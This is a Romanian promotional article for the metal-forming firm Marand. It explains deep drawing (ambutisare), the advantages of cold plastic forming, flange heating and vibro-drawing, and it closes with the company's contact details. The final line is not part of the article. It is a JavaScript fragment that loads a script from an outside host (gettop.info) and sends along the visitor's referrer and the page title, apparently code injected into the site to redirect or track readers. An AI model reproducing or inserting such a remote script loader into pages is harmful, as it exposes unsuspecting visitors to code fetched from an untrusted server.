Marand, un altfel de Gog

Marand, un altfel de GogIn mod sigur stii cine este celebrul roman talentat Gog! Pentru cine nu isi mai aduce aminte, Gog este cel care s-a prezentat la emisiunea Romanii au talent si ne-a aratat cum in mana i se deformau pana si lingurile, fara ca el sa exercite nici o actiune vizibila asupra lor. Firma Marand este si ea experta in deformari, la rece sau la cald, adica in ambutisare si putem spune ca este un altfel de Gog. Daca ai nevoie de piese ce se obtin prin acest procedeu tehnologic, Marand este partenerul tau ideal.

Ce este ambutisarea?


Ambutisarea este operatia de prelucrare prin deformare efectuata cu scopul transformarii unui semifabricat plan intr-o piesa cava sau de modificare in continuare a piesei cave, cu scopul cresterii adancimii si a micsorarii dimensiunilor transversale. Pentru prelucrarea prin presare la rece se folosesc atat materiale metalice feroase si neferoase, cat si nemetalice cum ar fi: hartie, carton presat, pasla, cauciuc sau mase plastice. Semifabricatele sunt, in general, produse laminate si sunt trase sub forma de benzi, table, bare si profile. Tehnologia de deformare plastica la rece este utilizata cu precadere in industria constructoare de masini si aparate, mecanica fina, electrica si electronica, dar si in industria alimentara.

Avantajele deformarii plastice la rece:

-se realizeaza piese de forme foarte apropiate de cele finite, cu adaosuri minime sau chiar fara adaosuri de material, rezultand astfel importante economii de materiale;
-se realizeaza piese intr-o gama de forme si dimensiuni, cu precizii ridicate;
-procedeele tehnologice sunt simple, iar productivitatea este crescuta;
-se poate introduce usor mecanizarea si automatizarea.

Procesul de ambutisare incepe la apasarea poansonului asupra semifabricatului. La inceput, forta de apasare fiind unica, are loc o usoara deformare locala, dupa care, pe masura ce eforturile cresc, materialul intra in curgere plastica si incepe procesul propriu-zis de ambutisare. Materialul este tras in spatiul dintre poanson si placa de ambutisare, rezultand piesa ambutisata.

Procesul de deformare la ambutisare este un proces complex care depinde de forma geometrica si materialul piesei, de tehnologia de deformare utilizata, de conceptia constructiva a matritelor de ambutisare si de utilajele de presare folosite. In functie de forma piesei si de precizia acesteia, ambutisarea se poate face dintr-o singura operatie sau in mai multe operatii succesive.

Numarul operatiilor de ambutisare se stabileste in functie de gradul de deformare necesar, procedeul de deformare utilizat, matritele folosite, materialul semifabricatului, cu proprietatile sale fizico-mecanice. Deformarea materialului de ambutisare se poate rezuma, de fapt, la deformarea flansei acestuia, flansa care se transforma total sau partial in perete ambutisat.

Alte metode de ambutisare:

– Ambutisarea cu incalzirea flansei semifabricatului. Procedeul se aplica pieselor cilindrice sau paralelipipedice inalte din materiale obisnuite pentru marirea gradului de deformare sau Marand, un altfel de Gog1pieselor din materiale greu deformabile sau cu plasticitate redusa. Principiul prelucrarii consta in obtinerea unei diferente maxim posibile intre rezistenta materialului deformat si rezistenta materialului partii semifabricatului in deformare.

– Vibroambutisarea si ambutisarea cu ultrasunete. Principiul care sta la baza procesului de vibroambutisare este cel de suprapunere peste miscarea statica a unei miscari dinamice, vibratorii, a elementelor active ale matritei si obtinerea astfel a deformarii materialului. Se aplica executarea pieselor dintr-o singura operatie, din materiale cu prelucrabilitate normala prin deformare plastica la rece sau din materiale greu deformabile, inlocuind ambutisarea cu incalzirea sau racirea locala a semifabricatului.

Poti sa apelezi cu incredere la serviciile oferite de firma Marand. Experienta indelungata in acest domeniu ii recomanda drept un bun partener de afaceri pentru tine.

Daca ai nevoie de serviciul de prelucrare prin ambutisare , ia legatura cu firma Marand. Pentru informatii suplimentare, apeleaza numerele 0724-308.410 si 0723-623.597 sau trimite un e-mail pe adresa contact@marand.ro .

In momentul in care vei contacta firma, mentioneaza faptul ca ai gasit-o pe site-ul zoom-biz.ro, pentru a obtine cel mai bun pret.

In continuare, poti citi un articol interesant despre atractii turistice in Neamt.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;